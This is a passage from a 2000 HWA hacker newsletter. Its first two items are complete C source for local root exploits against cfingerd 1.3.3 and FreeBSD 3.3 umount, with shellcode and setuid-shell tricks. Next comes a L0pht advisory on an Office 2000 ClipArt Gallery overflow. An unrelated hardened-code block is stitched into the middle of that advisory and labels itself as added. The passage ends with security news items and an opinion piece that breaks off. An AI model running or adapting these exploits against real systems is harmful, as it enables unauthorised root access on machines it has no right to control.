      /*           =-   http://infected.ilm.net/    -=         */
      
      @HWA      
      
163.0 cfingerd 1.3.3 (*bsd) root sploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      
      
      /*
      * babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * cfingerd 1.3.3 (*bsd) root sploit
      *
      * usage: adjust ptr until cfingerd will segfault with some random data on
      * output, now adjust ret.
      */
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <unistd.h>
      #include <errno.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <string.h>
      
      #define BUFFER_SIZE     80
      #define ADDRS           190
      #define PTR             0xbfbfd750
      #define RET             0xbfbfd7d2
      #define NOP             0x90
      #define FILE1           "user.inf"
      #define FILE2           "hack"
      #define FILE3           "set.c"
      #define SHELL           "/tmp/sh"
      #define FINGER          79
      #define MAXLINE         1024
      #define LOCALHOST       0x7f000001
      #define GREEN           "\E[1;32m"
      #define RED             "\E[1;31m"
      #define NORM            "\E[1;39m"
      #define UNBOLD          "\E[m"
      
      void sh(sockfd)
      int sockfd;
      {
              char buf[MAXLINE];
              int c;
              fd_set rf, drugi;
      
              FD_ZERO(&rf);
              FD_SET(0, &rf);
              FD_SET(sockfd, &rf);
      
              while (1)
              {
                      bzero(buf, MAXLINE);
                      memcpy (&drugi, &rf, sizeof(rf));
                      select(sockfd+1, &drugi, NULL, NULL, NULL);
                      if (FD_ISSET(0, &drugi))
                      {
                              c = read(0, buf, MAXLINE);
                              send(sockfd, buf, c, 0x4);
                      }
      
                      if (FD_ISSET(sockfd, &drugi))
                      {
                              c = read(sockfd, buf, MAXLINE);
                              if (c<0) return;
                              write(1,buf,c);
                      }
              }
      }
      
      int connectto(void)
      {
              int sockfd;
              char sendbuf[MAXLINE];
              struct sockaddr_in cli;
      
              bzero(&cli, sizeof(cli));
              cli.sin_family = AF_INET;
              cli.sin_addr.s_addr=htonl(LOCALHOST);
              cli.sin_port = htons(FINGER);
      
              if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
              {
                      perror("socket");
                      return -1;
              }
      
              if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) 
              {
                      perror("connect");
                      return -1;
              }
      
              sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME"));
              write(sockfd, sendbuf, strlen(sendbuf));
      
              sleep(1);
      
              fflush(stdout);
              fflush(stderr);
      
              sh(sockfd);
      
              return;
      }
      
      
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *buf1 = NULL, *buf2 = NULL, *p = NULL;
              u_long *addr_ptr = NULL;
              int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS;
              int retofs = 0, ptrofs = 0;
              long ret, ptr;
              FILE *phile;
      
              char execshell[] = 
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n");
      
              if(argc > 5)
              {
                      bufsize = atoi(argv[1]);
                      addrs = atoi(argv[2]);
                      ptrofs = atoi(argv[3]);
                      retofs = atoi(argv[4]);
              }
      
              if(!(buf1 = malloc(bufsize+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if(!(buf2 = malloc(addrs+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              ret = RET + ptrofs;
              ptr = PTR + ptrofs;
      
              noplen = bufsize - strlen(execshell);
              memset(buf1, NOP, noplen);
              strcat(buf1, execshell);
      
              p = buf2;
              addr_ptr = (unsigned long *)p;
      
              for(i = 0; i < (addrs / 4) /2; i++)
                      *addr_ptr++ = ptr;
      
              for(i = 0; i < (addrs / 4) /2; i++)
                      *addr_ptr++ = ret;
      
              p = (char *)addr_ptr;
              *p = '\0';
      
              if ((phile = fopen(FILE1, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..." NORM UNBOLD "\n", ret, ptr);
      
              fprintf(phile, "#Changing user database information for %s.\n"
                      "Shell: %s\n"
                      "Full Name: %s\n"
                      "Office Location: %s\n"
                      "Office Phone: \n"
                      "Home Phone: \n"
                      "Other information: \n", 
                      getenv("LOGNAME"), getenv("SHELL"), buf2, buf1);
      
              fclose(phile);
      
              if ((phile = fopen(FILE2, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              fprintf(phile, "cat user.inf>\"$1\"\n");
              fprintf(phile, "touch -t 2510711313 \"$1\"\n");
      
              fclose(phile);
      
              if ((phile = fopen(FILE3, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              // buffer is too small to execute seteuid/setegid there, so we have
              // to do this here.
      
              fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\");  execl(\"/bin/sh\", \"sh\", 0); }");
              fclose(phile);
      
              system("/usr/bin/cc -o " SHELL " " FILE3);
      
              unlink(FILE3);
      
              system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1");
      
              unlink(FILE1);
              unlink(FILE2);
      
              if (connectto() < 0)
                      return -1;
      
              unlink(SHELL);
      
              return 0;
      }
      
      
      
      
      
      
      /*           =- passed thru infected network  -=         */
      /*           =-   http://infected.ilm.net/    -=         */
      
      
      
      @HWA            
      
164.0 FreeBSD 3.3-RELEASE /sbin/umount exploit.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      /*
      *
      * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * FreeBSD 3.3-RELEASE /sbin/umount exploit.
      *
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define OFS             1800
      #define BUFSIZE         1024
      #define ADDRS           1200
      #define DIR             "babcia padlina ltd."
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              char *buf, *p;
              int noplen, i, ofs;
              long ret, *ap;
      
              if(!(buf = (char *)malloc(BUFSIZE+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc > 1)
                      ofs = atoi(argv[1]);
              else
                      ofs = OFS;
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              setenv("EGG", buf, 1);
      
              if(!(buf = (char *)malloc(ADDRS+1)))      
              {
                      perror("malloc()");
                      return -1;
              }
      
              p = buf;
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));
      
              chdir(getenv("HOME"));
              chmod(DIR, 0755);
              rmdir(DIR);
              mkdir(DIR, 0755);
              chdir(DIR);
              chmod(".", 0);
      
              execl("/sbin/umount", "umount", buf, 0);
      
              return 0;
      }
      
      
      /*           =- passed thru infected network  -=         */
      /*           =-   http://infected.ilm.net/    -=         */
      
      
      
      
      @HWA            
      
165.0 l0pht advisory 03/06/2000 ClipArt gallery overflow.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.l0pht.com/
            


      
                                    @Stake Inc.
                                L0pht Research Labs
                          www.atstake.com     www.L0pht.com
      
      
                                 Security Advisory       
      
             
              Advisory Name: ClipArt Gallery Overflow
          Advisory Released: 03/06/00
                Application: Microsoft Office 2000
                   Severity: An attacker can seize control of a Windows 95, 98, NT,
                             or 2000 machine via any HTML source, including 
                             Microsoft Outlook e-mail.
                     Status: Vendor patch available, workaround available
                     Author: dildog@l0pht.com
                        WWW: http://www.l0pht.com/advisories.html
                           
      
      Overview:
      
              ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000
      processes ".CIL" files for installation of clipart from the Internet. The
      CIL format is not handled properly by CAG.EXE and one of the internal fields
      in the file presents a buffer overflow condition, allowing arbitrary code to
      be executed by an attacker. The attacker would place a malicious CIL file
      on a website, or in an email, causing the target to import the CIL file. The
      file will be opened without prompting as the CIL file format does not require 
      confirmation for open after download. This issue requires NO active scripting 
      to exploit, and is NOT regulated by Internet Explorer 'security zones'.
      
      
      Description:
      
              The ".CIL" file format is a compressed clip-art delivery format that
      takes a Windows Metafile (WMF) or other image, stores it compressed, and
      packages it with keywords and descriptive information. Amongst the various 
      fields in the CIL format are a few Unicode strings, one of which is the 
      filename to which the clipart is to be decompressed. If the filename specified 
      is extremely long, a stack overflow occurs after a Unicode to ANSI conversion, 
      copying the ANSI version of the buffer over the stack frame. 
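
      The bug class described above, as an added example that is not part of
      the L0pht advisory or of Microsoft's code: a Unicode file-name field
      narrowed into a fixed buffer, first with no bound and then with the checks
      that stop the overflow. The record layout, NAME_CAP and every function
      name are assumptions for illustration; the advisory does not give the
      real CIL layout.

```c
/* Added example: bounded UTF-16LE -> single-byte conversion of a file-name
 * field. The record layout is hypothetical, not the real CIL format. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_CAP 260  /* destination size including the NUL; assumed limit */

enum name_status {
    NAME_OK = 0,
    NAME_TRUNCATED = -1, /* length prefix claims more than the record holds */
    NAME_TOO_LONG = -2,  /* name would not fit in the destination buffer */
    NAME_BAD_CHAR = -3   /* code unit outside printable ASCII */
};

/* The unsafe pattern, for contrast only: the copy stops at the source's
 * terminator, so the source decides how much of dst (and beyond) is written. */
void narrow_unchecked(char *dst, const uint16_t *wide)
{
    size_t i = 0;
    while (wide[i] != 0) {          /* no bound on i */
        dst[i] = (char)wide[i];
        i++;
    }
    dst[i] = '\0';
}

/* Hardened form. Assumed field layout: u16 little-endian count of code
 * units, then that many UTF-16LE code units, no terminator. On Windows the
 * narrowing itself would be WideCharToMultiByte with the destination size. */
int read_name_field(const uint8_t *rec, size_t rec_len,
                    char *dst, size_t dst_size)
{
    size_t units, i;

    if (dst_size == 0) return NAME_TOO_LONG;
    dst[0] = '\0';
    if (rec_len < 2) return NAME_TRUNCATED;
    units = (size_t)rec[0] | ((size_t)rec[1] << 8);
    if (units > (rec_len - 2) / 2) return NAME_TRUNCATED; /* lying prefix */
    if (units >= dst_size) return NAME_TOO_LONG;          /* room for NUL */
    for (i = 0; i < units; i++) {
        unsigned cu = rec[2 + 2 * i] | ((unsigned)rec[3 + 2 * i] << 8);
        if (cu < 0x20 || cu > 0x7e) {
            dst[0] = '\0';          /* never hand back a partial name */
            return NAME_BAD_CHAR;
        }
        dst[i] = (char)cu;
    }
    dst[units] = '\0';
    return NAME_OK;
}

/* Builds a constructed sample record of `units` code units that cycle
 * through `text`. Returns the record length, or 0 if it does not fit. */
size_t make_record(uint8_t *out, size_t cap, const char *text, size_t units)
{
    size_t i, tlen = strlen(text);
    if (tlen == 0 || units > 0xffff || cap < 2 + 2 * units) return 0;
    out[0] = (uint8_t)(units & 0xff);
    out[1] = (uint8_t)(units >> 8);
    for (i = 0; i < units; i++) {
        out[2 + 2 * i] = (uint8_t)text[i % tlen];
        out[3 + 2 * i] = 0;
    }
    return 2 + 2 * units;
}

/* Converts a constructed record holding `units` copies of 'f'. */
int convert_repeated(size_t units)
{
    static uint8_t rec[2 + 2 * 1024];
    char dst[NAME_CAP];
    size_t n = make_record(rec, sizeof rec, "f", units);
    return n ? read_name_field(rec, n, dst, sizeof dst) : NAME_TRUNCATED;
}

const char *demo_name(void)         /* ordinary short name */
{
    static char dst[NAME_CAP];
    uint8_t rec[64];
    size_t n = make_record(rec, sizeof rec, "tiger.wmf", 9);
    read_name_field(rec, n, dst, sizeof dst);
    return dst;
}

int demo_lying_length(void)         /* prefix says 65535, one unit present */
{
    const uint8_t rec[] = { 0xff, 0xff, 'a', 0x00 };
    char dst[NAME_CAP];
    return read_name_field(rec, sizeof rec, dst, sizeof dst);
}

int demo_bad_char(void)             /* second unit is U+0141, not ASCII */
{
    const uint8_t rec[] = { 0x02, 0x00, 'a', 0x00, 0x41, 0x01 };
    char dst[NAME_CAP];
    return read_name_field(rec, sizeof rec, dst, sizeof dst);
}

int main(void)
{
    printf("short name : %s\n", demo_name());
    printf("1000 units : %d\n", convert_repeated(1000));
    printf("lying size : %d\n", demo_lying_length());
    printf("non-ASCII  : %d\n", demo_bad_char());
    return 0;
}
```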
      
              Unfortunately, the current fix for this issue is really only a
      bandaid to the problem that Internet Explorer is used -for everything-
      nowadays and that its HTML parser allows random file formats to be
      downloaded and parsed without confirmation in a number of cases. One can
      expect to see similar issues to this in the future.
      
      Vendor provided fix:
      
              Get your patch here:
      
            http://www.microsoft.com/technet/security/bulletin/ms00-015.asp
      
      
      Quick solution:
      
              One may wish to go through all of the file type associations and
      turn on the 'Confirm Open After Download' checkbox to ensure that suspect
      file types are not automatically executed without user intervention.
      
              To do this in Windows 2000, open up a standard Explorer window (such as 
      My Computer), and go to the Tools menu and choose "Folder Options". Under the 
      "File Types" tab, go to the "CIL" file type and click on it. Now press the
      "Advanced" button. You will notice that the checkbox "Confirm Open After Download"
      is unchecked. Check it, and then click OK.
      
      Exploit:
      
              This CIL file will create a harmless registry key when opened. The 
      registry key location is:
      
              HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001
      
      This is proof of concept code only, but theoretically could be any executable
      code desired. This code works only on Windows 2000, but shifting around a
      few offsets yields code that works under Windows NT 4.0 and Win9X.
      
      
      
      
      dildog@l0pht.com 
      
        [ For more advisories check out http://www.l0pht.com/advisories.html ]
                                               L-ZERO-P-H-T
      
      
      @HWA
      
166.0 ISN:FBI views hackers as 'racketeers'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.apbnews.com/newscenter/internetcrime/2000/02/16/hackers0216_01.html

      WASHINGTON (AP) [2.16.00] -- The nation's top law enforcement
      officials today described "fast-developing leads" in finding the
      electronic vandals who shut down major Internet sites last week.
      
      But they also acknowledged serious challenges in the manhunt, saying
      the hackers were sophisticated enough to falsify their digital
      fingerprints. Attorney General Janet Reno said such a disguise
      technique "makes it difficult, and sometimes impossible, to hold the
      perpetrator criminally accountable."
      
      "I would simply say that we are taking the attacks very seriously and
      that we will simply do everything in our power to identify those
      responsible and bring them to justice," Reno told a Senate panel.
      
      FBI Director Louis J. Freeh, who also testified, said there were
      "fast-developing leads as we speak, and hopefully we can provide more
      details in coming days." He said FBI field offices in five cities have
      opened investigations into the attacks: Los Angeles, San Francisco,
      Atlanta, Boston and Seattle. More agents in other cities and overseas
      are also involved.
      
      A coordination problem
      
      Reno and Freeh also conceded important shortcomings in coordinating
      the myriad government agencies and public and private experts who help
      investigate high-tech crimes. "We're not doing so good," admitted
      Freeh, adding that cooperation was improving.
      
      The FBI also urged Congress today to consider expanding use of federal
      racketeering "RICO" laws -- traditionally used against the Mafia and
      drug cartels -- to apply against organized and persistent hackers. It
      also urged Congress to lower the $5,000 minimum in damages that victim
      companies must suffer before attackers can be prosecuted under federal
      computer crime laws.
      
      Freeh said lawmakers should consider "whether some of this activity,
      which goes beyond a single episode of fraud or hacking, gets into the
      realm of enterprise criminal activity."
      
      "RICO was intended to get gangsters," said Jennifer Granick, a
      California lawyer who has represented hackers. "Now, it's getting a
      bunch of kids in black concert T-shirts."
      
      Freeh said hackers in many of last week's attacks falsified the
      Internet addresses of the computers they used, "meaning that the
      address that appeared on the target's log was not the true address of
      the system that sent the messages."
      
      'An insidious, organized attack'
      
      EBay Inc. disclosed new details today about the Feb. 8 electronic
      assault launched against it, which shut down the world's largest
      online auction site for 90 minutes. Similar attacks disrupted other
      major commercial sites, including those of Yahoo, Amazon.com, Buy.Com,
      CNN and E*Trade.
      
      EBay's lawyer, Robert Chestnut, described an "insidious, organized
      attack" that was "obviously well planned." The attackers flooded
      eBay's site with 10 times its normal incoming data, transmitting a
      specific type of information identical to that used against Yahoo on
      Feb. 7.
      
      Chestnut told the Appropriations Subcommittee on Commerce, Justice,
      State and Judiciary that eBay also was attacked the evening of Feb. 9,
      but engineers were able to repel the second attack quickly.
      
      The FBI is contacting several hackers, known by their online
      nicknames. The bureau would not say whether its agents have talked
      with any suspects, but it appeared some interviews have begun, hacker
      sources said.
      
      Transportation Department sites hit
      
      The testimony from Reno and Freeh followed President Clinton's meeting
      Tuesday with technology experts about ways to improve Internet
      security. Participants said that during the talks, industry leaders
      urged the government to lead by example by making its computer systems
      secure.
      
      But overnight Tuesday, a hacker vandalized at least four Web sites at
      the Transportation Department, including the page for the agency's
      information officer, George Molaski. Those attacks were first noted by
      Attrition.Org, a computer security Web site that records such hacks.
      
      The computer breached by the hacker "was in the process of being
      fixed," Molaski said today. "Unfortunately, they got to it before we
      closed that door. It was a relatively simple vulnerability."
      
      Also today, House Commerce Chairman Tom Bliley, R-Va., criticized
      "highly vulnerable" computers at the Environmental Protection Agency
      (EPA), urging it to shut down its Internet connection immediately,
      citing an unreleased report by the General Accounting Office.
      
      EPA spokesman David Cohen said the agency has no plans to disable
      Internet access, adding that experts there have taken steps to
      strengthen security of computers with sensitive information.
      
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA
      
167.0 ISN:Pentagon probe targets Deutch
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.washtimes.com/national/news1-02172000.htm
      
      (The Washington Times) [2.17.00] The Pentagon is investigating whether
      ultrasecret "black programs" were compromised by former CIA Director
      John Deutch after he put details about some of the Defense
      Department's most sensitive activities on his home computers.
      
      Defense and intelligence officials said the Pentagon recently set up a
      special panel to examine a personal diary containing highly classified
      defense information that was kept improperly on Mr. Deutch's home
      computers -- desktop and laptop systems -- that were used to access the
      Internet and had received e-mail messages from abroad.
      
      The CIA, meanwhile, launched a "damage assessment" to determine
      whether its secrets were compromised by Mr. Deutch, who was CIA
      director from 1995 to 1996.
      
      The CIA withheld information from the Pentagon about what are known as
      "special access programs" for more than a year and only provided it
      after news reports highlighted the security breach earlier this month.
      
      Special-access programs are so secret that officials privy to them are
      authorized to lie to keep them from becoming public. Most are kept
      secret from the CIA and only disclosed to the Pentagon's top three or
      four officials.
      
      Mr. Deutch was briefed on many of these programs when he was
      undersecretary of defense for acquisitions and later deputy secretary
      of defense from 1993 to May 1995, when he became CIA director. Most of
      the programs have been ongoing for the past seven years.
      
      Rear Adm. Craig Quigley, a Pentagon spokesman, said a team of defense
      security officials was set up 10 days ago to review the material first
      uncovered in Mr. Deutch's diary by CIA security officials in January
      1997.
      
      Adm. Quigley said a damage assessment could result from the
      investigation but that none had been launched yet. "Let's just see
      what we find," he said.
      
      An intelligence official said the information on the black programs
      "was in some ways even more sensitive than the CIA" secrets kept on
      the home computers. The CIA information included details of agency
      covert action programs.
      
      Among the black programs currently under way are efforts to develop
      new weapons and methods of warfare, including electronic "information
      warfare" and how the U.S. military plans to conduct it in the future.
      They also include highly sensitive intelligence and collection
      development programs for future operations.
      
      That information is known to be a major target of foreign intelligence
      services from Russia, China and other nations.
      
      Other defense officials said privately the fact that details of
      special-access programs were kept on computers that are not secure is
      a security breach because of the sensitive nature of the programs.
      
      They said both Defense Secretary William S. Cohen and Deputy Defense
      Secretary John Hamre have resisted calls from officials involved in
      the programs to conduct a damage assessment. They did not say why.
      
      However, the Senate Select Committee on Intelligence is investigating
      whether the CIA covered up the Deutch affair to protect the nation's
      top intelligence official from punishment for mishandling secrets.
      
      Mr. Deutch declined to comment through his lawyer, Terry O'Donnell.
      
      The CIA recently launched a damage assessment of whether its secrets
      were compromised by Mr. Deutch's use of home computers to keep highly
      sensitive information after leaving the agency in December 1996, an
      intelligence official said.
      
      According to officials who have seen an inspector general report on
      the matter, the home computers were not secured and had been used to
      access pornographic Internet sites by someone in Mr. Deutch's
      household. Investigators also found that one of Mr. Deutch's computers
      had received an e-mail message from a Russian scientist living in
      Western Europe.
      
      In addition to the review team looking into the Deutch diary, Adm.
      Quigley said the Pentagon inspector general recently started an
      investigation into how the material ended up on four removable
      computer cards used by Mr. Deutch's Macintosh computers.
      
      "They're both ongoing," Adm. Quigley said of the investigations.
      
      In a related development, senior CIA officials failed to notify the
      Justice Department about possible criminal and ethical violations by
      Mr. Deutch shortly after the secrets were found on his home computer.
      
      CIA security officials uncovered "clear evidence" in early 1997 that
      Mr. Deutch may have violated three laws in using CIA-supplied home
      computers for personal use and for keeping and deleting secret
      information, said agency officials who spoke on the condition of
      anonymity.
      
      However, the Justice Department was never notified of the violations
      until months later.
      
      The FBI was first told about the security breach by Michael O'Neill,
      the CIA general counsel and friend of Mr. Deutch, in a telephone call.
      However, the FBI did not investigate the matter because there was no
      evidence of foreign government involvement, the officials said.
      
      When the Justice Department was notified in April 1998 of possible
      crimes, only one of the three laws was cited.
      
      A CIA official said senior agency managers deliberately focused on the
      possible disclosure of secrets to foreign powers because they knew
      those charges would not be pursued. The managers were not identified
      by name.
      
      "Nobody here ever claimed that he sold secrets to the Russians or even
      gave them anything," the official said. "Senior CIA officials knew
      nobody would prosecute him for that. . . . And the Justice Department
      didn't want the bad publicity so they went along with the charade."
      
      The "crime report" sent to Justice from the CIA inspector general in
      1998 also referred to a possible espionage-related offense that the
      official said was a "red herring" meant to distract attention from
      other serious crimes.
      
      Investigators planned to notify the Justice Department about "three
      crimes we knew were sure-fire violations with clear evidence, but the
      chiefs said 'no,' " the official said.
      
      The three violations included:
      
      * A law that provides for up to one year in prison for unauthorized
      removal or retention of classified documents.
      
      * A law that provides for up to three years in prison for concealing
      or attempting to destroy or remove government documents.
      
      * A law making it illegal to work on personal projects where a
      financial interest is involved.
      
      Security officials said the Government Ethics Office was never
      notified about one of the possible crimes related to Mr. Deutch's
      no-fee contract he arranged after leaving the CIA in December 1996.
      
      A spokesman for the Ethics Office said it was never informed about the
      possible conflict of interest.
      
      The CIA official said Mr. Deutch's CIA contract may have been illegal
      because the only reason for it was for Mr. Deutch to avoid having to
      buy his own computers.
      
      The official said the contract also appeared to be part of an effort
      by Mr. Deutch to avoid having to return the home computers to the CIA
      because he was fearful the improperly stored documents would be
      discovered.
      
      The CIA official also faulted current CIA Director George Tenet for
      failing to report the crimes to the Justice Department. The law
      required the CIA director to "expeditiously report" information about
      violations of Title 18 to the Justice Department.
      
      
      
      @HWA            
      
168.0 ISN:US Embassy's software originated back in the USSR
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.telegraph.co.uk:80/et?ac=000114832908976&rtmo=02xKsKGq&atmo=ggggg3JK&pg=/et/00/2/17/wspy17.html
      
      (The Daily Telegraph) [2.17.00] The State Department faced its second
      major security embarrassment in three months after admitting that it
      had sent its embassies a piece of software written by citizens of the
      former Soviet Union.
      
      In December, the department conceded that it had found a sophisticated
      listening device implanted in the walls of a conference room on what
      is supposed to be the most secure part of the building. A Russian
      diplomat was arrested and expelled after he was observed by the FBI
      monitoring the device from outside.
      
      The new security lapse occurred on Feb 2 when all American missions
      and embassies around the world were sent an urgent cable telling them
      to remove a piece of software from their mainframe computers.
      
      The programme had been written by a company called Synergy
      International Systems, which is based in Vienna, Virginia, but is
      owned by Armenians. The company, whose website says it also has
      offices in Moscow and Guatemala, says there is no security problem and
      that they are confident an internal review by the FBI will clear them
      of any suspicion.
      
      So far, investigators have not found any evidence of malpractice. The
      main fears are that the software could contain a hidden code that
      could download sensitive information from embassy computers or install
      bugs that could cause crashes in the system at critical moments.
      
      Bonnie Cohen, a senior administrator at the State Department, was
      quoted in the Washington Post yesterday as saying: "On the face of it,
      from what we know so far, it's an extraordinary lapse of judgment."
      
      The latest security scare follows the admission by the CIA that John
      Deutch, a former director, took top secret files home and installed
      them on his own computer, which he also used to look at the internet.
      
      
      
      
      @HWA            
      
169.0 ISN:Hacker posts phony press release
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.marketwatch.newsalert.com/bin/story?StoryId=CokUaubebDxmTAgfJA2vK&FQ=v%25upi&Title=Headlines%20for%3A%20v%25upi%20
      
      ANN ARBOR, Mich., Feb. 17 (UPI) [2.17.00] - Aastrom Biosciences Inc.
      Thursday initiated an investigation after a computer hacker posted a
      fake press release on its Web site announcing a merger with Geron
      Inc., a California biopharmaceutical company.
      
      Aastrom officials said they think the hacker was trying to manipulate
      the stock of both companies. Aastrom fell to 4 9/16 in early trading
      while Geron rose $9 to 56 .
      
      Aastrom President and CEO R. Douglas Armstrong said there was nothing
      to the merger announcement.
      
      "We are appalled by this ruthless attempt to manipulate markets and
      potentially harm the shareholders of both companies," Armstrong said.
      
      He apologized to shareholders and said the company was investigating
      security on its Web site.
      
      Geron said it was not conducting any merger talks with Aastrom.
      
      Aastrom officials discovered the fake press release on the web site
      Thursday morning and contacted Nasdaq and law enforcement authorities.
      
      The Ann Arbor, Mich., firm is developing technology to help replace
      cells damaged by cancer chemotherapy and holds patents on ways to grow
      human stem cells.
      
      Aastrom traded for as little as 31 cents a share in October but is
      considered a mover after reaching a 52-week high of $6.44 on Monday.
      
      Geron, of Menlo Park, Calif., is involved in research on aging, cancer
      and other age-related chronic diseases.
      
      
      
      @HWA            
      
170.0 ISN:Hacker, Media Hype and, Disinformation
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://cryptome.org/madsen-hmhd.htm
      
      17 February 2000. Thanks to Wayne Madsen <WMadsen777@aol.com>
      
      HACKERS, MEDIA HYPE, AND DISINFORMATION
      
      WAYNE MADSEN
      
      For what it is worth, I am a 20-year veteran of the computer security
      community. I have served in the Navy, National Security Agency, State
      Department, Computer Sciences Corporation, RCA, and have consulted on
      computer security with the National Institute of Standards and
      Technology, international banks, telecom companies and even firms that
      manufacture candy.
      
      While working for the FBI and Naval Investigative Service, I put one
      US Navy official in Federal prison for espionage and other crimes, and
      I was involved in U.S. counter-terrorism work in Greece and the
      Philippines. I think I know how the "spook" community operates and,
      more importantly, how it thinks.
      
      The hype associated with the recent Internet flooding is outrageous
      and serves the agendas of the military and intelligence communities
      regarding new vistas for bloated Pentagon and espionage budgets.
      
      On 17 February, National Public Radio's Diane Rehm Show had a round
      table discussion featuring James Adams, a former London Sunday Times
      reporter in Washington who is now a drum beater for information
      warfare, and Jeffrey Hunker, the former head of the White House
      Critical Infrastructure Assurance Office. Adams suggested that for
      critical infrastructure protection certain civil liberties must be
      forfeited. He also stated that Internet transactions should not be
      afforded the same degree of privacy as the U.S. mail.
      
      Hunker was uncomfortable that some people think that scare mongering
      has been at the center of the recent packet flooding of the Internet.
      Adams supported the CIA's creation of IN-Q-IT, a CIA Trojan Horse in
      the Silicon Valley. According to Adams, Science Applications
      International Corporation (SAIC), a virtual CIA proprietary firm, is
      funding, through IN-Q-IT, a program called Net Eraser. None of the
      participants in the Rehm Show were willing to talk about Net Eraser
      and some seemed very nervous about discussing it in detail.
      
      This radio program is highly indicative of the current hype
      surrounding the Distributed Denial of Service (DDOS) attacks on DOT
      COM sites on the Internet. Even the use of the acronym DDOS is
      amazing. Here they are, twenty-something DOT COM executives, who
      probably never thought about computer security except for watching
      re-runs of "Hackers" and "Sneakers," using Pentagon-originated terms
      like "Distributed Denial of Service" attacks.
      
      Why? Who told them to use those terms?
      
      Then Clinton manages to take 90 minutes to attend an Internet security
      summit on February 15. Northern Ireland's peace agreement is falling
      apart, the Israeli-Palestine agreement is unraveling, and Russia's new
      President is putting ex-KGB agents in his government, but Clinton has
      enough time to talk with a group of e-commerce barons, computer
      security geeks, and even one hacker. The whole thing appeared to be
      staged and scheduled way in advance.
      
      The whole so-called Internet "hack" smells of a perception management
      campaign by the intelligence community. Perhaps the system flooding
      was coordinated by one group -- however, those types of attacks
      probably occur on a daily basis without being reported by the world's
      media. It is important to note that one of the key components of
      information warfare -- according to the Pentagon's own seminal
      documents -- is perception management -- psychological operations to
      whip up public support for a policy or program. The early Defense
      Science Board reports on Critical Infrastructure Protection actually
      call for a campaign to change the public's attitude about information
      system and network security.
      
      The Pentagon is a master at deception campaigns aimed at the news
      media. They constantly broadcast disinformation to television and
      radio audiences in Haiti, Serbia, Colombia, Mexico and elsewhere. They
      are now extending this to cyber space. Critical infrastructure
      protection is a masterful ruse aimed at creating the myth of impending
      cyber-peril.
      
      The major domo is a weird chap named Richard Clarke, a Dr.
      Strangelove-type character who is Clinton's counter-terrorism czar. He
